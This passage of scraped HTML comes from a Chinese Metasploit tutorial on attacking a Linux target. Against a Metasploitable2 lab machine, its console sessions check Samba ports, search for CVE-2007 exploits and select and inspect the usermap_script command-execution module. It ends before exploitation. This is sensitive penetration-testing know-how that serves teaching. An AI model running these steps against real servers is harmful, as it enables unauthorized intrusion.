class=\"hljs-attr\">mod_time :<\/span> Modules with a matching modification date<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">name :<\/span> Modules with a matching descriptive name<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">path :<\/span> Modules with a matching path<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">platform :<\/span> Modules affecting <span class=\"hljs-built_in\">this<\/span> platform<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">port :<\/span> Modules with a matching port<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">rank :<\/span> Modules with a matching rank (Can be descriptive (<span class=\"hljs-attr\">ex:<\/span> <span class=\"hljs-string\">'good'<\/span>) or numeric with comparison operators (<span class=\"hljs-attr\">ex:<\/span> <span class=\"hljs-string\">'gte400'<\/span>))<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">ref :<\/span> Modules with a matching ref<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">reference :<\/span> Modules with a matching reference<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">target :<\/span> Modules affecting <span class=\"hljs-built_in\">this<\/span> target<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">type :<\/span> Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Examples:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">search <span class=\"hljs-attr\">cve:<\/span><span class=\"hljs-number\">2009<\/span> <span class=\"hljs-attr\">type:<\/span>exploit<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"35\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"36\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>\u901a\u8fc7\u00a0<code>search<\/code>\u6211\u4eec\u53ef\u4ee5\u67e5\u627e\u975e\u5e38\u591a\u7684\u4e1c\u897f\uff0c\u5305\u62ec\u6a21\u5757\uff0c\u6f0f\u6d1e\u7b49\u7b49\u3002<\/p>\n<h4 class=\"heading\">1\u3001\u653b\u51fbLinux\u670d\u52a1\u5668<\/h4>\n<p><code>Linux<\/code>\u662f\u4f7f\u7528\u6700\u4e3a\u5e7f\u6cdb\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e4b\u4e00\uff0c\u5728\u524d\u9762\u7684\u7ae0\u8282\u4e2d\uff0c\u6211\u4eec\u5b66\u4e60\u4e86\u5982\u4f55\u626b\u63cf\u53ef\u7528\u670d\u52a1\u548c\u5229\u7528\u6f0f\u6d1e\u626b\u63cf\u5668\u626b\u63cf\u67e5\u627e\u76ee\u6807\u6f0f\u6d1e\u3002\u5728\u672c\u8282\u4e2d\uff0c\u6211\u4eec\u5c06\u4f7f\u7528<code>Metasploitable2<\/code>\u4f5c\u4e3a\u9776\u673a\uff0c\u6211\u4eec\u5c06\u5229\u7528<code>Samba<\/code>\u670d\u52a1\u6f0f\u6d1e\u5bf9<code>Linux<\/code>\u76ee\u6807\u673a\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p>\u9996\u5148\uff0c\u6211\u4eec\u4f7f\u7528<code>servives<\/code>\u547d\u4ee4\u67e5\u627e\u4e4b\u524d<code>nmap<\/code>\u7684\u626b\u63cf\u7ed3\u679c\uff0c\u5e76\u8fc7\u6ee4<code>139<\/code>\u548c<code>445<\/code>\u7aef\u53e3\u3002<\/p>\n<pre><code class=\"hljs linux copyable nginx\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attribute\">msf5<\/span> &gt; services -c port,<span class=\"hljs-literal\">info<\/span> -p <span class=\"hljs-number\">139<\/span>,<span class=\"hljs-number\">445<\/span> <span class=\"hljs-number\">192.168.177.145<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Services<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">========<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">host port <span class=\"hljs-literal\">info<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">---- ---- ----<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">192.168.177.145<\/span> <span class=\"hljs-number\">139<\/span> Samba smbd <span class=\"hljs-number\">3<\/span>.X - <span class=\"hljs-number\">4<\/span>.X workgroup: WORKGROUP<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">192.168.177.145<\/span> <span class=\"hljs-number\">445<\/span> Samba smbd <span class=\"hljs-number\">3<\/span>.X - <span class=\"hljs-number\">4<\/span>.X workgroup: WORKGROUP<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable nginx\"><\/code><\/pre>\n<p>\u73b0\u5728\u6211\u4eec\u77e5\u9053\u4e86\u76ee\u6807<code>Samba<\/code>\u7684\u7248\u672c\u4fe1\u606f\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u53bb\u67e5\u627e\u76f8\u5bf9\u5e94\u7684\u6f0f\u6d1e\uff0c\u7136\u540e\u4f7f\u7528<code>search<\/code>\u547d\u4ee4\u641c\u7d22\u53ef\u4f7f\u7528\u7684\u653b\u51fb\u6a21\u5757\u3002<\/p>\n<p>TIP\uff1a\u6211\u4eec\u53ef\u4ee5\u5728\u901a\u7528\u6f0f\u6d1e\u62ab\u9732\uff08CVE\uff09\u5728\u7ebf\u5e73\u53f0<code>https:\/\/www.cvedetails.com<\/code>\u4e2d\u627e\u5230\u6709\u5173<code>Samba 3.0.20<\/code>\u6f0f\u6d1e\u7684\u7ec6\u8282\u3002<\/p>\n<p>\u901a\u8fc7\u00a0<code>search<\/code>\u547d\u4ee4\u8fc7\u6ee4\u00a0<code>CVE<\/code>\u3001<code>\u6a21\u5757\u7c7b\u578b<\/code>\u3001<code>\u5173\u952e\u5b57<\/code>\u5373\u53ef\u627e\u5230\u53ef\u5229\u7528\u7684\u653b\u51fb\u6a21\u5757\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">search<\/span> <span class=\"hljs-string\">cve:2007<\/span> <span class=\"hljs-string\">type:exploit<\/span> <span class=\"hljs-string\">samba<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Matching<\/span> <span class=\"hljs-string\">Modules<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">================<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">exploit\/linux\/samba\/lsa_transnames_heap<\/span> <span class=\"hljs-number\">2007-05-14 <\/span><span class=\"hljs-string\">good<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Samba<\/span> <span class=\"hljs-string\">lsa_io_trans_names<\/span> <span class=\"hljs-string\">Heap<\/span> <span class=\"hljs-string\">Overflow<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">exploit\/multi\/samba\/usermap_script<\/span> <span class=\"hljs-number\">2007-05-14 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Samba<\/span> <span class=\"hljs-string\">\"username map script\"<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">exploit\/osx\/samba\/lsa_transnames_heap<\/span> <span class=\"hljs-number\">2007-05-14 <\/span><span class=\"hljs-string\">average<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Samba<\/span> <span class=\"hljs-string\">lsa_io_trans_names<\/span> <span class=\"hljs-string\">Heap<\/span> <span class=\"hljs-string\">Overflow<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">exploit\/solaris\/samba\/lsa_transnames_heap<\/span> <span class=\"hljs-number\">2007-05-14 <\/span><span class=\"hljs-string\">average<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Samba<\/span> <span class=\"hljs-string\">lsa_io_trans_names<\/span> <span class=\"hljs-string\">Heap<\/span> <span class=\"hljs-string\">Overflow<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>1\u3001\u9009\u62e9\u653b\u51fb\u6a21\u5757<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 &gt; use exploit<span class=\"hljs-regexp\">\/multi\/<\/span>samba\/usermap_script<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi<span class=\"hljs-regexp\">\/samba\/<\/span>usermap_script) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>2\u3001\u8fd0\u884c<code>info<\/code>\u53ef\u67e5\u770b\u6a21\u5757\u4fe1\u606f<\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script) &gt; info<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Name<\/span>: <span class=\"hljs-string\">Samba \"username map script\" Command Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Module<\/span>: <span class=\"hljs-string\">exploit\/multi\/samba\/usermap_script<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Platform<\/span>: <span class=\"hljs-string\">Unix<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Arch<\/span>: <span class=\"hljs-string\">cmd<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Privileged<\/span>: <span class=\"hljs-string\">Yes<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">License<\/span>: <span class=\"hljs-string\">Metasploit Framework License (BSD)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Rank<\/span>: <span class=\"hljs-string\">Excellent<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Disclosed<\/span>: <span class=\"hljs-string\">2007-05-14<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">......<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Description<\/span>:<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">This<\/span> <span class=\"hljs-string\">module exploits a command execution vulnerability in Samba<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">versions<\/span> <span class=\"hljs-string\">3.0.20 through 3.0.25rc3 when using the non-default<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-meta\">\"username<\/span> <span class=\"hljs-string\">map script\" configuration option. By specifying a username<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">containing<\/span> <span class=\"hljs-string\">shell meta characters, attackers can execute arbitrary<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-meta\">commands.<\/span> <span class=\"hljs-string\">No authentication is needed to exploit this vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">since<\/span> <span class=\"hljs-string\">this option is used to map usernames prior to authentication!<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">References<\/span>:<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">https<\/span>:<span class=\"hljs-string\">\/\/cvedetails.com\/cve\/CVE-2007-2447\/<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">OSVDB<\/span> <span class=\"hljs-string\">(34700)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">http<\/span>:<span class=\"hljs-string\">\/\/www.securityfocus.com\/bid\/23972<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">http<\/span>:<span class=\"hljs-string\">\/\/labs.idefense.com\/intelligence\/vulnerabilities\/display.php?id=534<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">http<\/span>:<span class=\"hljs-string\">\/\/samba.org\/samba\/security\/CVE-2007-2447.html<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script) &gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable 